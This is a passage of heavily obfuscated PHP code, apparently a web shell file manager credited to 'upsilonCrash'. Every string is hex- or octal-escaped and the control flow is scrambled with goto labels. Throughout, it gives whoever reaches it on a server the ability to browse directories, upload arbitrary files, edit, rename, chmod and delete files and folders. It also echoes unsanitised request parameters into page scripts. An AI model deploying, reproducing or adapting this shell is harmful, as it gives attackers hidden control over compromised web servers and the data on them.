nSCuk: if (is_dir($path)) { if ($path !== "\x2f") { $slash = "\57"; } else { $slash = ''; } } else { $checkslash = substr($path, 2); if (is_dir($checkslash)) { if ($checkslash !== "\57") { $slash = "\57"; } else { $slash = ''; } } else { if (is_file($checkslash)) { if ($checkslash !== "\x2f") { $slash = "\x2f"; } else { $slash = ''; } } } } goto KcYvS; Zackz: $scanPath = array_diff($scanPath, array("\56", "\56\x2e")); goto fYM4d; JJbg1: for ($i = 0; $i < count($scanPath); $i++) { $iota = $scanPath[$i]; $pathType = mime_content_type($path . $slash . $iota); $pathType = explode("\x2f", $pathType); $sizeA = filesize($path . $slash . $iota); $filesize = $sizeA; $sizeks = "\x42"; if ($sizeA > 1024) { $filesize = round($sizeA / 1024); $sizeks = "\113\102"; } if ($sizeA > 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024); $sizeks = "\x4d\x42"; } if ($sizeA > 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024); $sizeks = "\x47\x42"; } if ($sizeA > 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024); $sizeks = "\124\x42"; } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024); $sizeks = "\120\x42"; } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024); $sizeks = "\105\102"; } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024); $sizeks = "\132\x42"; } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024) { $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024); $sizeks = "\131\x42"; } $result = filemtime($path . $slash . $iota); $result = getdate($result); $one = strlen($result["\x6d\144\141\171"]); $two = strlen($result["\x6d\x6f\x6e"]); $three = strlen($result["\171\x65\x61\x72"]); $four = strlen($result["\x68\x6f\x75\162\163"]); $five = strlen($result["\155\151\156\165\x74\145\163"]); if ($one == "\x31") { $result["\155\144\x61\x79"] = "\60" . $result["\x6d\144\141\171"]; } if ($two == "\x31") { $result["\x6d\x6f\x6e"] = "\60" . $result["\155\157\x6e"]; } if ($three == "\61") { $result["\171\145\141\162"] = "\60" . $result["\171\145\x61\162"]; } if ($four == "\x31") { $result["\150\157\165\x72\x73"] = "\x30" . $result["\x68\157\165\x72\x73"]; } if ($five == "\61") { $result["\155\x69\x6e\x75\x74\145\x73"] = "\60" . $result["\155\x69\x6e\x75\164\x65\163"]; } $result = $result["\155\x64\141\x79"] . "\55" . $result["\x6d\x6f\156"] . "\x2d" . $result["\x79\145\141\162"] . "\40" . $result["\x68\x6f\x75\x72\163"] . "\x3a" . $result["\155\151\156\x75\164\x65\x73"]; if ($pathType[0] == "\x74\x65\x78\164") { echo "\x3c\x74\162\x3e\74\x74\x64\40\x77\151\144\164\x68\75\47\62\45\x27\76\74\144\151\x76\40\143\154\x61\x73\163\75\x27\151\143\x6c\x61\x73\163\47\x3e\x46\74\57\x64\151\166\x3e\74\x2f\x74\x64\x3e\x3c\x74\x64\40\167\151\x64\164\150\x3d\x27\65\60\x25\47\x3e\x7c\40\74\x69\156\160\165\x74\x20\164\x79\160\x65\75\x27\x74\x65\x78\164\x27\40\x72\145\141\144\x6f\x6e\154\171\75\47\x72\x65\141\144\157\x6e\154\x79\47\x20\x69\144\x3d\x27\157\156\x65\47\x20\x76\x61\154\x75\x65\x3d\47" . $iota . "\47\40\x73\164\x79\x6c\x65\x3d\x27\x77\x69\144\164\150\72\40\65\x30\x25\x27\x3e\x3c\57\164\144\76\xa\x20\40\x20\40\40\x20\40\x20\x3c\x74\144\x20\167\x69\x64\164\150\75\47\61\60\x25\47\76\74\143\x65\x6e\164\145\x72\76" . $filesize . $sizeks . "\74\57\x63\x65\156\164\x65\162\76\74\57\x74\144\76\x3c\164\144\40\x77\x69\144\164\x68\x3d\47\62\x30\45\47\x3e\74\143\x65\x6e\x74\x65\162\x3e" . $result . "\74\x2f\143\145\x6e\164\145\x72\x3e\74\x2f\x74\x64\x3e\12\x20\x20\x20\x20\40\x20\x20\40\74\x74\x64\40\x77\x69\x64\x74\x68\75\47\65\45\x27\x3e\x3c\x63\x65\x6e\164\x65\x72\x3e\x3c\x61\x20\164\151\x74\x6c\x65\75\47\143\x68\x6d\x6f\144\40" . $iota . "\x27\40\150\x72\145\146\75\47\77\x70\x61\x74\150\75" . base64_encode("\43\103" . $path . $slash . $iota) . "\x27\76" . substr(sprintf("\x25\157", fileperms($path . $slash . $iota)), -4) . "\74\57\x61\76\74\x2f\x63\x65\x6e\164\x65\162\x3e\74\57\x74\x64\x3e\12\x20\40\40\x20\x20\40\x20\40\74\164\144\40\x73\x74\x79\154\145\75\47\x77\151\x64\164\150\72\40\65\45\47\76\74\x63\x65\156\164\145\x72\x3e\74\141\x20\x74\151\x74\x6c\145\75\x27\x65\x64\151\164\40" . $iota . "\47\40\x68\162\145\x66\x3d\47\x3f\x70\141\164\150\75" . base64_encode("\x23\x45" . $path . $slash . $iota) . "\x27\x3e\105\74\57\141\x3e\12\x20\40\40\x20\x20\40\40\40\x3c\141\40\164\151\164\154\145\x3d\47\x72\145\x6e\x61\155\x65\x20" . $iota . "\47\x20\150\162\x65\146\75\47\x3f\160\x61\164\150\x3d" . base64_encode("\x23\x52" . $path . $slash . $iota) . "\47\x3e\122\74\x2f\141\76\12\40\x20\40\40\x20\40\40\x20\x3c\x61\40\164\151\164\154\145\x3d\x27\x64\x65\x6c\145\x74\145\40" . $iota . "\47\x20\150\x72\145\x66\75\x27\77\160\x61\x74\150\75" . base64_encode("\x23\x44" . $path . $slash . $iota) . "\47\76\104\x3c\57\x61\x3e\x3c\x2f\x63\x65\x6e\x74\145\162\76\74\x2f\164\144\x3e\12\40\40\x20\x20\x20\40\40\40\74\57\x74\162\76"; } else { if ($pathType[0] == "\141\160\x70\x6c\x69\143\141\x74\x69\157\156") { echo "\x3c\x74\162\x3e\x3c\164\144\40\x77\x69\x64\164\x68\x3d\47\62\x25\47\76\x3c\x64\x69\x76\x20\x63\154\141\163\x73\x3d\x27\x69\143\154\141\163\x73\x27\76\x46\x3c\x2f\144\151\166\76\x3c\x2f\164\144\x3e\74\x74\144\x20\x77\x69\144\x74\x68\x3d\47\65\x30\x25\47\76\x7c\x20\x3c\x69\156\160\x75\x74\40\164\171\160\x65\x3d\47\x74\x65\x78\164\x27\x20\162\145\141\x64\x6f\x6e\154\171\75\47\162\x65\x61\x64\x6f\x6e\x6c\171\47\40\151\144\75\47\157\x6e\x65\47\x20\x76\141\x6c\165\145\x3d\47" . $iota . "\47\x20\163\x74\171\154\145\x3d\47\x77\x69\144\x74\150\72\40\x35\x30\45\47\76\x3c\57\x74\x64\76\12\40\40\x20\40\x20\40\40\40\x20\x20\x20\x20\x3c\164\x64\x20\x77\151\144\x74\150\x3d\47\x31\60\x25\x27\x3e\74\143\145\156\x74\x65\x72\76" . $filesize . $sizeks . "\x3c\x2f\143\145\156\164\x65\x72\76\x3c\57\x74\x64\x3e\74\164\x64\x20\x77\x69\144\164\150\x3d\x27\62\60\45\47\x3e\x3c\x63\145\156\164\x65\x72\x3e" . $result . "\x3c\57\x63\x65\x6e\164\145\x72\76\x3c\x2f\164\x64\x3e\xa\x20\x20\40\x20\40\x20\40\40\40\x20\x20\x20\74\164\x64\40\167\151\144\x74\150\75\x27\x35\x25\x27\x3e\74\x63\x65\x6e\164\x65\x72\x3e\x3c\141\x20\x74\151\x74\154\x65\x3d\47\143\x68\155\157\x64\40" . $iota . "\47\x20\x68\162\145\146\75\47\77\x70\141\164\150\75" . base64_encode("\x23\x43" . $path . $slash . $iota) . "\47\76" . substr(sprintf("\x25\157", fileperms($path . $slash . $iota)), -4) . "\x3c\57\x61\76\74\57\143\145\x6e\x74\x65\162\76\74\57\x74\x64\x3e\12\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\40\x3c\x74\x64\x20\x73\164\x79\x6c\145\75\x27\167\151\144\x74\150\x3a\40\x35\x25\47\76\74\143\x65\x6e\x74\145\162\76\74\x61\40\164\151\x74\x6c\x65\x3d\x27\145\x64\x69\x74\x20" . $iota . "\47\x20\x68\x72\x65\x66\75\x27\x3f\160\141\x74\150\x3d" . base64_encode("\x23\105" . $path . $slash . $iota) . "\47\76\105\74\x2f\x61\76\12\40\x20\x20\40\40\40\x20\x20\40\x20\40\x20\74\141\40\x74\x69\164\154\145\75\47\x72\x65\x6e\x61\x6d\x65\40" . $iota . "\x27\x20\x68\x72\145\146\x3d\47\x3f\x70\141\164\150\75" . base64_encode("\x23\122" . $path . $slash . $iota) . "\47\x3e\x52\74\x2f\x61\76\12\x20\x20\x20\x20\x20\40\x20\x20\40\x20\40\40\x3c\x61\x20\x74\151\164\154\x65\75\x27\144\x65\154\145\164\x65\x20" . $iota . "\x27\40\150\x72\145\146\75\47\77\x70\141\x74\150\75" . base64_encode("\x23\104" . $path . $slash . $iota) . "\x27\76\104\x3c\57\141\76\74\x2f\143\x65\156\164\x65\x72\76\x3c\x2f\164\x64\x3e\xa\x20\40\x20\x20\40\40\40\x20\x20\x20\x20\x20\74\57\x74\162\x3e"; } } } goto RuHaG; orkb_: for ($i = 0; $i < count($scanPath); $i++) { $iota = $scanPath[$i]; if (is_dir($path . $slash . $iota)) { $result = filemtime($path . $slash . $iota); $result = getdate($result); $one = strlen($result["\x6d\144\141\x79"]); $two = strlen($result["\155\157\x6e"]); $three = strlen($result["\x79\145\141\x72"]); $four = strlen($result["\150\157\x75\162\x73"]); $five = strlen($result["\155\x69\156\x75\x74\145\x73"]); if ($one == "\61") { $result["\x6d\144\x61\171"] = "\x30" . $result["\x6d\144\141\171"]; } if ($two == "\61") { $result["\155\157\156"] = "\x30" . $result["\155\157\156"]; } if ($three == "\61") { $result["\x79\145\x61\x72"] = "\x30" . $result["\x79\145\x61\x72"]; } if ($four == "\61") { $result["\x68\x6f\165\x72\163"] = "\60" . $result["\150\157\x75\162\163"]; } if ($five == "\61") { $result["\155\151\156\165\164\x65\163"] = "\x30" . $result["\155\x69\156\165\164\145\x73"]; } $result = $result["\155\x64\x61\171"] . "\x2d" . $result["\155\x6f\x6e"] . "\55" . $result["\171\x65\141\162"] . "\x20" . $result["\x68\x6f\x75\162\x73"] . "\x3a" . $result["\155\151\156\165\x74\x65\x73"]; echo "\x3c\164\x72\x3e\74\164\144\40\x77\x69\x64\x74\150\75\47\x32\45\x27\76\74\x64\151\x76\x20\143\154\x61\163\163\75\x27\x69\143\x6c\141\x73\163\47\76\x44\74\57\144\151\x76\76\x3c\57\164\144\x3e\74\x74\x64\40\x77\x69\x64\x74\150\x3d\47\65\x30\45\47\76\x7c\40\74\x69\156\160\x75\164\40\x74\x79\x70\x65\75\47\164\x65\170\164\47\x20\162\145\141\x64\x6f\156\154\171\75\47\x72\145\141\x64\x6f\156\154\x79\x27\40\151\x64\x3d\47\x6f\x6e\x65\47\x20\166\141\x6c\165\145\75\47" . $iota . "\x27\40\x73\x74\x79\x6c\x65\75\47\x77\x69\x64\x74\150\x3a\40\x35\60\x25\47\x3e\x3c\57\x74\144\76\xa\40\40\40\x20\x20\40\40\x20\74\164\144\x20\167\x69\144\164\x68\x3d\x27\61\60\45\x27\x3e\74\143\145\x6e\x74\x65\162\76\55\74\x2f\x63\x65\x6e\164\x65\162\76\74\57\x74\x64\76\74\164\x64\40\x77\x69\x64\x74\x68\75\47\x32\x30\45\47\76\x3c\x63\145\156\164\145\x72\76" . $result . "\74\57\x63\x65\x6e\x74\x65\x72\76\x3c\x2f\164\x64\x3e\xa\x20\x20\x20\x20\x20\40\40\40\74\x74\144\x20\167\151\144\x74\x68\75\47\65\x25\x27\x3e\x3c\143\x65\156\164\145\x72\x3e\x3c\141\x20\x74\151\x74\x6c\x65\x3d\x27\x63\x68\155\157\144\40" . $iota . "\47\40\x68\162\x65\146\75\47\77\x70\x61\x74\150\75" . base64_encode("\43\x43" . $path . $slash . $iota) . "\47\x3e" . substr(sprintf("\x25\x6f", fileperms($path . $slash . $iota)), -4) . "\x3c\x2f\x61\76\74\57\x63\145\x6e\x74\x65\162\76\74\57\164\144\x3e\xa\40\40\40\40\x20\x20\x20\40\74\164\x64\x20\x73\164\x79\x6c\x65\x3d\x27\167\151\144\x74\150\72\40\65\x25\x27\76\x3c\143\x65\156\164\145\162\76\74\141\x20\164\151\x74\x6c\x65\x3d\x27\x6f\x70\x65\x6e\x20" . $iota . "\x27\40\150\162\x65\x66\x3d\47\x3f\160\x61\x74\150\75" . base64_encode($path . $slash . $iota) . "\x27\x3e\x4f\x3c\x2f\x61\x3e\xa\40\x20\x20\40\x20\x20\x20\40\x3c\x61\40\x74\151\x74\x6c\x65\75\47\162\x65\x6e\x61\x6d\145\40" . $iota . "\47\40\150\162\145\x66\75\47\77\160\141\164\x68\x3d" . base64_encode("\43\x52" . $path . $slash . $iota) . "\47\76\122\74\57\x61\76\12\x20\x20\x20\x20\x20\40\x20\40\74\x61\x20\164\151\164\154\x65\x3d\x27\x64\x65\154\x65\x74\x65\40" . $iota . "\47\x20\150\162\x65\x66\75\47\x3f\160\141\164\150\75" . base64_encode("\x23\104" . $path . $slash . $iota) . "\47\76\x44\x3c\x2f\x61\x3e\x3c\57\x63\145\x6e\164\x65\x72\76\x3c\x2f\x74\x64\76\xa\40\x20\40\x20\x20\x20\40\40\74\57\164\162\x3e"; } } goto JJbg1; P70p5: if (isset($_POST["\x6d\x6f\x76\x65\x5f\x75\160\154\x6f\x61\x64"])) { if (strpos($_POST["\165\x70\164\157\160\141\164\150"], "\56\x2e") !== FALSE) { echo "\xa\40\x20\40\40\x20\x20\x20\x20\x3c\163\x63\162\151\x70\x74\76\xa\40\x20\40\x20\x20\x20\40\40\x61\154\x65\x72\x74\50\x27\146\x61\x69\x6c\x65\x64\47\51\73\xa\x20\x20\40\40\x20\40\x20\40\144\157\x63\x75\x6d\x65\x6e\x74\56\154\x6f\143\x61\x74\x69\157\156\56\150\162\x65\x66\40\75\40\47\x3f\160\141\164\150\x3d" . $_GET["\160\x61\x74\x68"] . "\x27\x3b\xa\40\40\40\40\40\40\40\x20\x3c\57\163\143\162\151\160\x74\76\12\x20\40\40\x20\x20\40\x20\40"; } $fileName = $_FILES["\x66\x69\154\x65"]["\x6e\x61\155\145"]; $tmpName = $_FILES["\146\151\154\145"]["\x74\155\160\137\156\x61\x6d\145"]; $upload = $_POST["\x75\160\x74\157\160\x61\164\150"] . $slash . $fileName; if (is_file($upload)) { echo "\12\40\40\x20\40\x20\x20\x20\x20\74\x73\x63\162\151\160\164\76\12\40\40\x20\x20\x20\40\x20\x20\x61\154\145\162\x74\50\47\x66\151\x6c\145\40\156\141\x6d\x65\x20\141\x6c\x72\x65\x61\x64\x79\x20\x65\170\151\163\164\x73\x27\x29\73\xa\40\x20\x20\40\40\40\40\x20\144\157\x63\165\x6d\x65\x6e\164\x2e\x6c\x6f\x63\141\164\151\157\156\56\150\x72\145\x66\x20\x3d\40\47\x3f\x70\x61\x74\x68\75" . $_GET["\160\141\164\x68"] . "\47\x3b\xa\x20\x20\40\x20\40\40\x20\x20\x3c\57\x73\x63\162\x69\160\164\x3e\xa\x20\x20\40\40\40\40\x20\x20"; } else { if (move_uploaded_file($tmpName, $upload)) { echo "\xa\40\40\x20\40\40\40\x20\x20\x20\x20\x20\40\x3c\163\143\x72\x69\x70\x74\76\xa\40\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\141\x6c\145\x72\164\x28\x27\163\x75\x63\x63\x65\x73\x73\x66\x75\x6c\154\x79\47\51\x3b\xa\x20\40\x20\x20\40\x20\x20\x20\40\40\x20\x20\144\157\143\165\155\x65\156\x74\56\154\157\x63\141\x74\x69\x6f\156\x2e\150\x72\x65\146\x20\x3d\x20\47\77\x70\x61\164\150\x3d" . $_GET["\x70\x61\164\x68"] . "\x27\x3b\12\x20\x20\x20\x20\40\x20\40\x20\40\x20\40\40\x3c\x2f\x73\x63\162\x69\x70\164\x3e\12\40\x20\x20\40\x20\x20\x20\40\x20\40\40\40"; } else { echo "\xa\40\40\x20\x20\40\40\x20\40\40\40\40\x20\74\x73\143\162\151\x70\164\x3e\xa\40\x20\x20\x20\x20\40\40\40\40\40\40\40\x61\154\x65\x72\164\50\x27\146\141\151\x6c\x65\x64\47\x29\73\12\40\40\x20\40\x20\40\x20\40\40\x20\40\x20\144\157\143\x75\x6d\x65\156\x74\56\154\x6f\143\x61\x74\151\157\x6e\x2e\x68\162\x65\146\40\75\40\47\x3f\160\x61\x74\x68\75" . $_GET["\160\x61\x74\x68"] . "\47\73\12\x20\x20\40\40\x20\x20\40\x20\x20\x20\40\40\74\57\163\143\162\x69\x70\x74\76\xa\x20\40\40\x20\x20\40\40\40\40\40\40\40"; } } } goto SWgHB; eDuok: if (substr($path, 0, 2) == "\43\x44") { $delta = substr($path, 2); $back = dirname($delta); if (isset($_POST["\163\x75\x62\x6d\x69\164\137\144\x65\154\145\164\145"])) { if (is_dir($delta)) { if (rmdir($delta)) { echo "\xa\40\40\x20\40\x20\40\40\40\x20\40\x20\x20\x20\40\x20\x20\74\x73\x63\x72\x69\160\x74\x3e\xa\x20\x20\40\x20\40\40\x20\40\40\x20\40\x20\x20\x20\40\40\141\154\145\162\164\x28\x27\163\x75\143\143\x65\x73\163\x66\165\154\154\x79\47\51\x3b\xa\40\40\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\x20\40\x64\x6f\x63\x75\x6d\145\156\x74\x2e\154\x6f\x63\x61\164\x69\x6f\156\x2e\x68\162\x65\146\40\x3d\40\x27\x3f\160\141\x74\150\75" . base64_encode($back) . "\x27\x3b\xa\x20\x20\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\x3c\57\x73\x63\162\x69\160\x74\x3e\12\40\x20\40\x20\40\40\40\x20\40\40\40\x20\40\x20\x20\x20"; } else { echo "\12\x20\40\40\40\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\x20\x3c\163\x63\162\x69\x70\x74\76\xa\x20\40\x20\40\40\x20\x20\x20\40\x20\x20\40\x20\40\40\x20\x61\154\145\162\164\50\47\x66\x61\x69\x6c\x65\x64\x27\x29\73\xa\x20\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\x64\x6f\x63\165\x6d\x65\x6e\x74\56\x6c\157\143\x61\x74\x69\x6f\x6e\x2e\150\x72\x65\x66\x20\75\40\47\77\160\x61\164\x68\x3d" . base64_encode($back) . "\47\73\xa\40\x20\40\40\40\40\40\40\40\x20\x20\40\x20\40\40\x20\x3c\57\163\x63\162\151\160\164\76\xa\40\x20\40\40\40\40\40\x20\x20\x20\40\40\40\x20\40\x20"; } } else { if (unlink($delta)) { echo "\12\40\x20\40\40\40\x20\x20\40\40\40\x20\40\40\40\x20\x20\x3c\x73\143\162\x69\x70\164\x3e\xa\40\x20\x20\x20\40\x20\x20\x20\x20\40\x20\x20\40\x20\x20\40\141\154\145\x72\x74\50\47\x73\165\143\143\145\163\163\x66\165\x6c\x6c\x79\x27\x29\x3b\12\x20\40\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\40\x20\x64\x6f\143\x75\x6d\x65\156\x74\x2e\154\157\143\x61\x74\x69\157\156\x2e\x68\162\145\146\x20\75\40\x27\77\160\141\x74\150\x3d" . base64_encode($back) . "\47\x3b\12\40\40\x20\40\x20\40\x20\40\40\x20\40\x20\40\x20\x20\x20\x3c\x2f\x73\143\x72\x69\x70\x74\x3e\12\40\x20\40\40\x20\40\40\40\x20\40\40\40\x20\x20\40\40"; } else { echo "\xa\x20\x20\x20\40\40\x20\40\x20\x20\40\40\40\x20\40\x20\x20\74\163\x63\x72\151\160\164\76\xa\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\x20\40\40\x61\154\145\162\x74\x28\47\x66\x61\x69\154\x65\144\47\x29\x3b\12\40\x20\x20\x20\40\40\40\40\x20\40\40\40\x20\x20\x20\x20\144\x6f\143\165\155\145\x6e\x74\56\x6c\157\143\141\164\151\157\x6e\x2e\x68\x72\145\146\40\75\x20\x27\x3f\x70\141\164\150\x3d" . base64_encode($back) . "\x27\73\xa\x20\40\40\x20\x20\x20\x20\x20\x20\40\40\40\40\40\x20\x20\x3c\x2f\x73\143\x72\151\x70\x74\76\12\40\40\40\40\x20\x20\40\40\x20\x20\40\40\40\40\x20\x20"; } } } if (is_dir($delta)) { $cat = "\x66\x6f\154\144\x65\162"; } else { $cat = "\x66\151\x6c\145"; } echo "\x70\x61\164\x68\x20\x3a\40\x3c\x69\156\160\x75\x74\40\x74\x79\x70\145\75\x27\x74\145\x78\164\x27\x20\x72\x65\x61\x64\x6f\156\154\x79\75\x27\162\x65\141\144\x6f\156\154\171\47\40\166\141\154\x75\x65\75\x27" . $delta . "\x27\x20\x69\x64\75\47\157\x6e\145\x27\x20\163\x74\171\x6c\145\x3d\x27\167\x69\x64\164\150\x3a\x20\70\x30\45\73\47\76\x3c\x62\162\76\12\x20\40\40\40\x6e\141\155\x65\40\x3a\40\x3c\x69\156\160\x75\164\x20\164\171\x70\145\75\x27\x74\x65\170\x74\47\40\162\x65\x61\x64\x6f\x6e\x6c\x79\75\x27\162\145\141\144\x6f\x6e\154\171\x27\40\166\141\x6c\165\145\75\47" . basename($delta) . "\x27\x20\x69\144\x3d\x27\x6f\156\145\x27\x20\x73\x74\171\x6c\x65\75\47\x77\x69\x64\x74\150\x3a\x20\70\x30\45\x3b\x27\x3e\74\x62\162\x3e\xa\x20\40\40\x20\141\162\145\40\x79\x6f\165\x20\x73\165\162\145\40\x74\157\x20\x70\145\162\x6d\x61\156\x65\x6e\164\154\x79\40\x64\x65\154\145\x74\x65\x20\x74\150\x69\163\40" . $cat . "\77\74\x68\x72\40\x63\x6f\x6c\157\162\75\x27\x47\162\x61\x79\x27\x3e\74\x63\145\x6e\164\x65\x72\76\xa\40\40\x20\x20\x3c\141\40\150\162\x65\x66\75\x27\77\160\x61\x74\150\75" . base64_encode($back) . "\x27\76\156\157\74\x2f\x61\x3e\74\x69\156\x70\165\164\x20\164\x79\x70\145\75\x27\163\x75\142\x6d\x69\x74\47\x20\x6e\x61\155\145\75\47\x73\165\x62\x6d\151\x74\x5f\x64\145\x6c\145\164\145\47\x20\166\141\154\x75\145\x3d\47\x79\145\x73\x27\x20\151\144\75\x27\164\x77\157\x27\76\12\x20\x20\x20\x20"; die; } goto aRlp5; p2LzQ: if (isset($_POST["\143\162\x65\x61\x74\x65\x5f\x66\157\154\x64\145\162"])) { echo "\12\x20\x20\40\x20\x63\x72\145\141\164\145\x20\x6f\x6e\x20\x3a\x20\x3c\151\156\x70\x75\164\x20\x74\x79\160\x65\x3d\x27\164\145\170\x74\47\40\x61\165\164\x6f\x63\157\x6d\x70\x6c\x65\x74\x65\x3d\47\x6f\146\146\47\x20\151\144\75\47\164\145\x78\164\x69\156\160\165\x74\47\x20\x6e\141\155\145\x3d\x27\x70\141\164\150\146\157\x6c\144\x65\x72\47\40\x76\x61\x6c\165\145\75\x27" . $path . $slash . "\x27\x20\x77\x69\x64\x74\150\75\x27\61\60\x30\x70\x78\47\76\x3c\x62\x72\x3e\xa\x20\40\x20\x20\x3c\151\156\x70\165\164\x20\x74\x79\x70\x65\75\47\x74\145\x78\x74\x27\40\141\x75\x74\x6f\x63\157\155\160\154\x65\164\145\75\x27\x6f\146\146\x27\x20\x6e\x61\x6d\145\x3d\x27\146\157\154\x64\x65\162\156\141\x6d\x65\47\x20\x69\x64\75\x27\164\x68\162\145\145\47\x20\160\154\x61\x63\x65\x68\x6f\154\x64\145\162\75\x27\x66\x6f\x6c\144\x65\162\x20\x6e\141\x6d\145\x27\76\x3c\150\x72\x20\143\x6f\154\x6f\162\75\47\107\x72\x61\x79\x27\76\x3c\143\145\156\x74\x65\162\76\x3c\x61\x20\x68\x72\145\146\x3d\47\77\x70\141\164\150\x3d" . $_GET["\x70\141\164\150"] . "\47\x3e\143\x61\156\x63\145\x6c\74\57\141\x3e\xa\40\x20\40\40\x3c\x69\156\160\165\x74\40\164\x79\x70\145\x3d\47\163\x75\142\155\151\x74\47\40\x6e\x61\155\x65\x3d\47\143\162\x66\x27\40\x76\141\x6c\x75\x65\x3d\x27\143\x72\x65\141\164\x65\x27\40\x69\144\x3d\47\x74\x77\157\x27\76\xa\x20\40\40\40"; die; } goto fq9Qh; dSPjL: echo "\74\57\x74\141\x62\x6c\145\76\x3c\150\162\x20\x63\x6f\154\157\x72\x3d\x27\x47\x72\x61\171\47\76\74\143\145\156\164\145\x72\x3e\x63\x6f\144\x65\x64\40\142\x79\40\x75\160\163\151\154\x6f\x6e\103\162\x61\x73\x68\x3c\x2f\x66\x6f\x72\x6d\76"; goto PR0tu; JZ6YT: echo "\x3c\x70\162\x65\76\x3c\143\145\x6e\164\145\162\76\12\x2e\144\70\70\x38\70\142\40\x20\70\70\70\40\x20\70\x38\x38\40\x38\x38\x38\x38\70\142\x2e\40\x20\x20\x2e\x64\70\x38\x62\56\40\40\x38\x38\x38\40\x20\x38\x38\x38\40\x38\x38\70\40\x20\x38\70\x38\12\70\x38\x4b\40\x20\40\40\40\40\x38\70\70\x20\x20\x38\x38\x38\40\x38\x38\x38\40\47\x38\70\x62\x20\144\x38\70\x50\x27\70\x38\x62\40\x38\x38\x38\x20\40\x38\70\70\x20\140\131\x38\x62\144\70\x50\x27\xa\x27\x59\70\70\x38\x38\142\x2e\x20\x38\70\x38\40\x20\70\x38\x38\x20\x38\x38\70\x20\x20\70\70\x38\40\x38\70\x38\40\40\70\x38\x38\40\x38\x38\x38\40\40\70\70\x38\x20\40\x20\130\70\x38\113\x20\40\12\40\x20\x20\x20\40\x58\70\70\x20\x59\x38\70\x62\x20\70\70\x38\x20\x38\x38\70\40\40\x38\x38\x38\x20\x59\x38\70\x62\x20\70\70\70\40\131\x38\x38\142\x20\x38\70\70\x20\x2e\x64\70\x27\47\70\x62\56\12\144\x38\x38\70\x38\70\x50\x27\40\40\x27\131\x38\x38\70\x38\70\x20\x38\70\70\x20\x20\x38\70\x38\40\40\47\x59\70\x38\x38\x38\70\x20\x20\x27\131\x38\x38\x38\70\x38\x20\70\70\x38\40\x20\x38\70\x38\xa\40\40\40\40\x20\40\40\40\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\x20\40\40\x20\40\40\x20\x20\x20\40\x20\40\40\70\70\70\x20\40\40\40\40\x20\x20\x20\40\40\x20\x20\40\x20\x20\40\x20\x20\xa\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\40\40\40\40\40\x20\40\x20\40\40\x20\x20\x20\40\40\40\131\70\x62\x20\144\70\x38\120\x20\x20\x20\x20\x20\x20\x20\40\x20\40\40\40\x20\x20\40\40\40\x20\xa\40\x20\x20\x20\x20\40\x20\40\40\40\x20\x20\40\x20\40\x20\40\40\40\x20\x20\x20\40\x20\x20\x20\40\40\x27\131\70\70\x50\x27\40\40\x20\x20\40\40\40\40\x20\40\x20\40\40\x20\40\x20\x20\x20\x20\12\x3c\57\x63\145\156\164\x65\x72\x3e\x3c\57\x70\x72\x65\76"; goto cfpHX; Tvnac: if (isset($_POST["\x63\x72\x66\154"])) { if (strpos($_POST["\x70\141\164\150\146\151\154\145"], "\x2e\56") == FALSE) { if (is_dir($_POST["\x70\x61\164\150\146\x69\154\145"])) { $slashcheck = explode("\57", $_POST["\160\141\x74\x68\146\x69\x6c\x65"]); $slashcheck = implode("\x2f", $slashcheck) . $slash; if (strpos($_POST["\146\x69\x6c\145\x6e\x61\155\x65"], "\57") == FALSE) { $filePath9 = $slashcheck . $_POST["\x66\151\154\x65\x6e\141\x6d\145"]; if (!is_file($filePath9)) { $createFile = fopen($filePath9, "\x78"); if ($createFile) { echo "\xa\40\40\40\x20\40\40\x20\x20\x20\40\40\40\x20\40\x20\40\40\x20\40\40\x20\40\x20\40\x3c\163\x63\x72\x69\x70\164\76\xa\40\40\x20\x20\x20\x20\x20\40\40\x20\40\40\x20\40\40\x20\x20\x20\40\x20\x20\40\40\40\x61\x6c\x65\x72\164\50\x27\163\165\143\x63\x65\163\x73\146\x75\x6c\x6c\171\x27\51\73\12\40\40\40\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\x20\40\40\40\x20\40\x20\40\x20\x20\144\157\x63\165\x6d\145\x6e\164\x2e\x6c\x6f\143\141\164\151\x6f\156\x2e\150\x72\x65\x66\40\x3d\40\x27\77\160\x61\164\x68\75" . $_GET["\x70\x61\x74\150"] . "\x27\73\12\x20\x20\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\40\40\40\40\40\x20\40\40\x20\40\x20\74\57\x73\143\x72\x69\x70\164\76\xa\40\40\40\40\40\x20\40\x20\x20\40\40\40\40\40\40\x20\x20\x20\40\40\40\40\40\x20"; } else { echo "\12\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\x20\x20\40\40\40\40\x20\x20\40\x20\x20\x20\40\x3c\x73\x63\x72\151\160\164\76\12\40\40\x20\40\40\x20\40\x20\40\40\40\40\40\x20\40\40\40\40\40\x20\40\x20\x20\x20\x61\154\145\x72\x74\x28\x27\x66\x61\x69\154\x65\144\x27\x29\73\xa\x20\40\x20\40\x20\40\40\40\x20\40\x20\40\40\40\40\x20\40\x20\40\x20\40\x20\x20\x20\144\x6f\143\x75\x6d\x65\x6e\164\x2e\154\x6f\143\x61\x74\x69\157\156\56\150\162\x65\146\40\x3d\40\47\77\160\x61\x74\150\75" . 